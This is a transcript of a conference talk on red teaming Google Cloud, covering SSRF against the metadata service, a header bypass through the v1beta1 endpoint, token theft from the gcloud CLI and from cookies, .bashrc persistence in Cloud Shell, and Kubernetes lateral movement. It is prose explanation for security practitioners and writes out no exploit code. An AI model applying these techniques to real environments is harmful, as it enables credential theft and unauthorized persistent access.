 Take a seat. It is my pleasure to introduce Bryce, who will be talking about May the Cloud be with you, red teaming GCP. I'll let him take it away. Oh, and real quickly, a slight announcement. We have a, if you're doing the skydiving, see registration today at 1 PM to sign up for a time slot. Back to you. Thanks, appreciate that. All right, I'm Bryce. This is my Twitter handle, tweakfox. So if you want the slides, I'll throw up a link to the slides right after this. So check it out on Twitter. And then we're going to be talking about GCP today, just kind of going over the basics of how you would red team inside the environment, and then just maybe like cool little nuances that you may or may not already know about on the platform. So who am I? I'm Bryce. I used to work at Homeland. I used to lead the incident response and focus operations for the unclassified sock. So that's kind of like hunting down APTs. Then I worked at NSA for a while. I was a technical director up there over a very specific offensive unit. And then I worked at Adobe. I built a red team out for them, specifically in their digital experience business unit located out in Utah. And that is where I physically reside now is near Salt Lake City, Utah. So great skiing out there. And then now I lead stage two security. We're just like a small boutique firm, like 25 people. And we do a lot of pen testing and tool dev and stuff like that. So oh, yeah. Also, I run B-side Salt Lake City. I'm the head of that nonprofit. So anyways, if you guys want to come ski in March, it's usually pretty good still. All right. So GCP overview, because it's only 25 minutes, I kind of ripped out most of the overview. So this is a crash course in cloud. So all right, if you're like an admin and you log into it via the website, that's kind of you log in into the management UI. So that's console.cloud.google.com. If you're using the CLI type tools, you're going to talk directly to the Control Plane APIs. And anytime you're clicking anything inside the website for GCP, that's just going to be calling the Control Plane APIs below it. And as you create resources or services, that's going to reach out to the Data Plane and spin those out. So if you have any type of automation processes or CI-CD pipeline, that's generally just going to talk to the Control Plane APIs, the rest of the APIs there, which are then going to spin up the services in the Data Plane. And typical services in the Data Plane would be like a load balancer and then some type of compute, like a virtual machine and then storage. And cloud providers are ever trying to generate in the space and they have an array of different services that would be hard to be an expert in all of them. But most people who are using the cloud just kind of at least are using these basics. All right, so let's just dig into the compute engine, which is kind of like virtual machines on the GCP platform. So a vulnerability that's really interesting in the cloud space is server-side request forgeries. So typically, you would have a web application and you would be hosting that on a virtual machine. And let's say back in the day, this was inside a data center and you had a nice thick internet-facing data center firewall. So you could get to the web server, but you couldn't necessarily get to any of the other surrounding servers inside the target network. In this example here, we have an application where a user would typically request the slash app URI, and then they'd pass a git parameter for b.jpeg. And then the web app would process that request, say, oh, they want b.jpeg that's over here on this other server that's internal only. I'm going to make a request out to that, grab the content, and then feed it back to the user. So that's kind of the typical way that the web app would work. Now if a web application wasn't checking inputs, then it might be vulnerable to a server-side request forgery, or an attacker could replace the image, the value there in the git parameter, to another server internal to the data center, and maybe retrieve back some type of data that they necessarily shouldn't be able to access. For example, if there's like a monitoring server, maybe like a Nagios, or something like that on the internal, maybe they could pull some type of stats page off that. It's a vulnerability, but it's not going to lead to a full compromise of the whole data center, typically. So fast-forwarding to cloud, SSRFs in the cloud are deadly, right? So because when you spin up your VM in the cloud, the control plane needs a way to communicate certain data to the data plane about what it should be doing. So for example, when you boot a VM, maybe you want it to execute a bootstrip, right? Like run this bash script when you boot up. How is the control plane going to tell the data plane to do that? It's going to take that boot script, put it inside this metadata service, which is like a RESTful API that the VM can call out to. And when the VM initially boots, it's going to call out to that RESTful API that's internal only to it, kind of like a Fabric IP, and then it's going to run that bash script. So there is an RFC spec on metadata services, but each vendor's implementation of it greatly varies from the RFC spec. But generally, it's always going to be on that 169.254.169.254 IP address. And big thing here is credentials for GCP services could be stored in that metadata service, which would be accessible via a server-side request for GCP vulnerability. On GCP specifically, there's like a nice FQDN that just resolves to that 169 IP on the other platforms, Azure and AWS, as far as I know, that doesn't exist. All right, but let's say you have a server-side request for GRI in a web application, and it's running on top of the GCP platform, and you redirect it to go to the metadata service, you might see back an error message similar to this, like 4, 3, forbidden. OK, so why are you seeing 4, 3, forbidden? That's because Google has implemented additional protections to prevent server-side request for GRIs' vulnerabilities from being able to access the metadata service. Namely, you have to set another HTTP header in order to access the metadata service. So this applies to Azure and GCP. For most of the stuff, you can query via their metadata services. It does not apply to AWS. There's no HTTP header on the AWS platform right now. So we're the attacker, and now we're sad because we can't get back the creds out of the metadata service to interact with the control plane. So there's kind of this loophole in GCP. And if you look up more docs about it, it says deprecated and will be removed. But it still worked. I mean, I tried this last week, and it still works, right? So I don't know what their timeline is for deprecating it. But basically, if you use slash v1, beta 1, not all the same features are there, but most of the features you want are there, like the credentials. So you just call that, and then you don't need to pass the metadata header, HTTP header. And now you're all happy as a panda. All right, so for example, here's a sweet lizard website. And in it, there's a request for external image. And then the git parameter p, the value of that is some external JPEG stored in an S3 bucket somewhere. And so we'll just modify that so the git parameter p points to the metadata server's FQDN, or you could do the 169.254 IP address, and then use the slash v1, beta 1 with this URI. And what you're going to get returned back is this bearer token right here, or access token. And this is what you're going to need to start authenticating to the GCP control plane with the same rights that the VM is running as inside of the cloud provider. So generally, what you'll do is you'll take that access token right there, and then you'll query this Google APIs right here. And it's going to tell you, one, yeah, that token works. And then two, it's also going to tell you the scope of the token. So this is incredibly nice, because it actually tells you what you can use the token to do, what the token can do inside of the GCP account. Versus on AWS, you might get access to a token, but then you'd have to, a lot of times, blindly guess what it can access inside the environment. If we try to use that token to spin up another VM, it's going to send us back this message by default, like insufficient permissions. So let's look into why we don't have rights to that. If we go to the Web Management Console, like an admin, and then we go over to the Compute Engine service, and we go to spin up a new VM, we're going to see there's a block there for identity and API access. So one of the cool parts about GCP is you could actually specify what that access token inside the metadata service will have access to, which is a little different than the way it operates on Azure and AWS. But allow default access. If we can pick that, that's not going to let us spin up VMs. We'll look at that more in a second. But we could also pick set access for each API, and that will let us pick, like, hey, I want this box to be able to talk to BigQuery or some other GCP service. So by default, these are the services that you can query. You can see Compute Engine, that's disabled, so you cannot spin up more VMs if you still creds this way. And yeah, we'll come back around to this more in a second. And then there's also that middle box, full access. So if that was selected when the VM was spinning up, then yes, those credentials can totally be used to spin up more VMs inside the environment that are under the attacker's control. So it really depends on the permissions there that are set around the VM when they're booted up. There's some scripts here on this GitHub for just those requests I showed you there. You don't really need to use them. I just more put them there for documentation purposes. All right, cool. So let's look at storage, right? Ton of cloud storage breaches out there. This is just from a small six-month period. We see names like Accenture, Verizon, Timor and Acable, Dow Jones, DGI, all using storage account and cloud providers without properly securing them. So there's a cool project out there called buckets.greyhatwarfare.com where they just go and index all these public buckets and you can search through them. I'm not sure on the legality of this, but it's a cool idea. Basically, in the cloud space, there's two permissions that you want to watch out for on the GCP and AWS platforms. All users means public and all authenticated users. Sounds like only people in your GCP count would be able to get to the files or resources and objects in the buckets. But what that actually means is anybody who has any GCP account can get to the resources. So that tripped a lot of people up on the AWS platform specifically. The cloud providers have made changes in the last year or so to the interfaces for storage accounts to make it a lot harder for you to make objects public. So that is positive from a defense side. But you'll still see stuff set up incorrectly. Generally speaking, storage on GCP is pretty uniformed. It's storage.googleapis.com. Then you have to have a globally unique bucket name. And then you'll have the object or file name here. You can't set buckets listable. This is not a typo, but the top does say the Amazon S3 spec for the list. So that is the way GCP does that. And you could brute force for objects or bucket names using a tool like GoBuster, just like you would on any web engagement. OK, so one thing that I just wanted to highlight real quickly is if you spin up a VM and use the default settings and you look under storage, it says by default you have read-only access to storage. So what does that actually mean? And what that means is there's this concept in GCP of a project. And so almost everything in GCP is segmented at the project level. So you have an organization. You'll want to create a folder underneath it, even if you don't use the folder. And then you'll want to create projects underneath that folder. So if you get the credentials out of the metadata service and then there's a storage inside that same project, even if that requires authentication, you'll be able to read the objects in that storage account. So that's a good way to expand access. OK, we've got a few minutes left. So I'm going to talk about Kubernetes. Basically, the scenario we got here is there's a container running a web app. It has some vulnerability in it that enables remote code execution. For the demos, you might see in screenshots I load up the Voodoo tool, which is kind of our cross platform post-exploitation tool. And then we kind of see what damage could be done inside the cluster or how you would expand access from there. This is really looking at GKE, Google Kubernetes Engine specifically. There's a lot of different Kubernetes implementations out there. And this is just kind of default setup as of 30 days ago. OK, cool. So if you exploit a web app in your attacker, how would you even know that you're inside a container? One way is you could cat proc one C group. And you can see in the listings, if you can see the monitors, that it says, this is a kube pod, right? If Docker's in use, you could LS the root. And generally, you'll see that hidden file Docker environment. And then the other one is, if you do a PS, a process list on the box, you'll see that PID 1 looks weird, right? It doesn't look like a net or launch D, which are typically some of the early processes that get started up on Linux systems. For example, this would be a typical case where you'd see a Flask web app as PID 1. So you know you're inside a container environment. OK, so probably no secret here if you're familiar with Kubernetes, but there's creds basically stored in this location right here on disk. So if you can read that, then you can start authenticating to the Kubernetes API. One thing to keep in mind is that Kubernetes, the way it works on GCP, it just creates instances under Compute Engine. So even if you get access to a container by default, you can redirect and talk to the metadata service, just like we saw in the past example. Grab those creds and start using them to talk at the GCP level. So here's an example where we load up a Python script and we pull creds out of the metadata, get back that access token. One thing that is kind of interesting is as part of the bootstrapping process on the GCP platform, there is a Kube environment set inside the metadata service. So this is used when worker nodes are being bootstrapped or loaded initially, and you can pull those credentials out of there. Now there's a little more work that you need to do here in order to be able to use those to talk to the Kubernetes API, and you can check out the references on the bottom of this slide, and I will post the slides on my Twitter account for you guys. But you go through a couple of steps and then you can authenticate to the API and potentially spin up more pods inside the cluster. All right, another way you can expand access, if you get access to a container, is by default, there's really no enforcement of network boundaries. You would have to implement something like Itso or Cilium inside the cluster to prevent that. So a compromised pod could talk to the Kubelet service on these TCP ports. So here's a Python script that I load up into memory only to scan for the port, and then another Python script where we would just access those to list out what pods are running on the other worker nodes inside the cluster. And then container security is really just Linux kernel security, and this is one thing that I think, if you don't take anything else away from here, that hopefully you'll take away is, there was a vulnerability earlier this year, the Run C vulnerability, and that would allow you to break out of the container and get code running on the host. But the DirtyCal exploit from a number of years ago would also do the same thing, which is typically an exploit used to progress from user to root on a Linux system. But it would also have the capability to break you out of the container. So container security is really just Linux kernel security. You could use a set comp or some other controls to try and prevent what kernel API calls can be called from the container, but yeah, for the most part. Like a common thing that you'll see a lot if you search for like Kubernetes hacking is after they gain some type of credentials, they'll talk to the API and then they'll deploy another pod that has a container that will have the root file system mounted. You know, this may or may not work in your target environment, the security posture of it. And another thing to just kind of be aware of from a high level is they're constantly rolling features into Kubernetes. And most of that code is accessible by this API here. So some of that code is gonna have vulnerabilities. And in 2018, there was a vulnerability in the API that would enable you to bypass all authentication and authorization. So basically if you just talk to the API for Kubernetes, you could do anything inside the cluster. One thing that I've been releasing this on engagement but technically you have something that's managing the containers on the worker nodes like Docker, so if you were to misconfigure it with an unprotected TCP socket, you could move laterally that way too. Okay, great. Okay, so we talked a little bit about breaching the environments from server side, right? Coming in from the internet. I just wanted to talk a little bit about breaching from client side or trying to get access to either the engineers or the cloud admins laptops, right? So may or may not be applicable to you but a lot of tech companies, they use Mac endpoints. There was a recent vulnerability in Excel on Mac that would basically allow you to get code execution via an XLM macro. So that just came out last month or this month. And then prior to that, I don't know if you guys know Patrick Warderl but he has a lot of research up on his blog that's really good if you're interested in Mac exploitation, the blog's objective, see there's links in the references. But basically if you can take advantage of a vulnerability like the XML one or whatever, XLM, then you could get code execution on a laptop. And if you were to get code execution on a laptop and they were using the CLI for GCP, it would create this dot config folder and then you'll see some files underneath that. And the files you'd see underneath that look like this, right? And the one that says access tokens.db looks pretty good. So if we start checking that out, we realize that's just an SQLite database. And if we extract the data out of there, we can get a token that allows to authenticate to the GCP control plane in the context of whatever that admin can do from his laptop. Also to know, there is also inside that same database, a list of the scope of what those credentials can access. So that's nice from an exploitation standpoint. You can see how valuable they are pretty quick. And then another thing I just wanna highlight is cookies, right? Like a lot of the admins aren't even installing the CLIs on their laptops anymore. And I'll show you why in a second. But they still authenticate using their browsers. There's a cool technique, cookie crimes. If you haven't checked it out, you should. But you could exploit the cookies, replay them, or to jump into their browser sessions. So when you're inside GCP and a few of the other cloud providers have copied this, there's a cloud shell. And this is really popular with the SREs or admins for the cloud now. Cause they don't have to install anything on their laptop. They just log in with their browser and they can click this button in the upper right-hand corner and then a containerized environment gets deployed and they can run all their commands from that containerized environment, right? So that's cool. The first thing to note from an offensive standpoint, like let's say I still someone's cookies and I'm somehow able to access the GCP environment, but it's not gonna last long, right? So I wanna persist some way. So I thought about this in the context of the cloud shell because I see this in use a lot now. And you'll see right there, it says, your home directory will persist across sessions, right? From an attacker's standpoint, but that sounds pretty great, right? So what if we just make a slight modification to it, old-school-skyle, like we dork the BashRC to load up our tool whenever they load up this environment? Does that actually work? Can we get a callback out of the cloud shell environment? And yeah, the answer to that is yeah, we get a callback every time they click that button and the BashRC gets loaded to our LP where our red teaming software is at. And then from there, we have the same level of access that the admin does inside the cloud shell. Two minutes. Okay, so there's some really cool, I don't know, Twitter chatter, is that the right term? Just on how to get outside of that shell because that shell's kind of a container. So I guess the route, you can get to the root host below it just by running that command at the top. So I did that and from there, you can access the metadata service from the root host, but there's not really much you can access from there, so that's kind of mostly a dead end. But from a persistence standpoint, I did notice that you can store files when you're on the host below that container in slash temp and they have a few other mount points that are writable and those seem to persist at least for a moderate amount of time. So that's kind of cool, maybe like a little bit of a covert store type system if you were using this in real life. All right, one minute left. Okay, last thing, okay. So when a pod goes to authenticate to the API or somebody else, what really happens on the hood? You get authentication off N, then you get authorization off Z. Make sure that you're allowed to do what you're doing. And then there's this new thing called admission control. And what does admission control does? It does really useful things like validates that what you're trying to deploy inside the cluster isn't doing anything bad from a security standpoint. But like for example, mounting the host's root file system and things like that. But what I noticed was you can have, because they didn't wanna make you code everything inside of that, you can reach out to an external admission control. So let's imagine you get some type of privilege access inside the Kubernetes cluster and you wrote a evil external admission control. You could mutate deployments as they move into the cluster. And this is a newer thing, it's still alpha beta. So you may not see this in production, but I definitely feel like this is the way the industry is moving. And with that being said, I'm Bryce. If you wanna talk more, just be hanging outside. I know I went through a lot quick, but thank you guys for listening. So.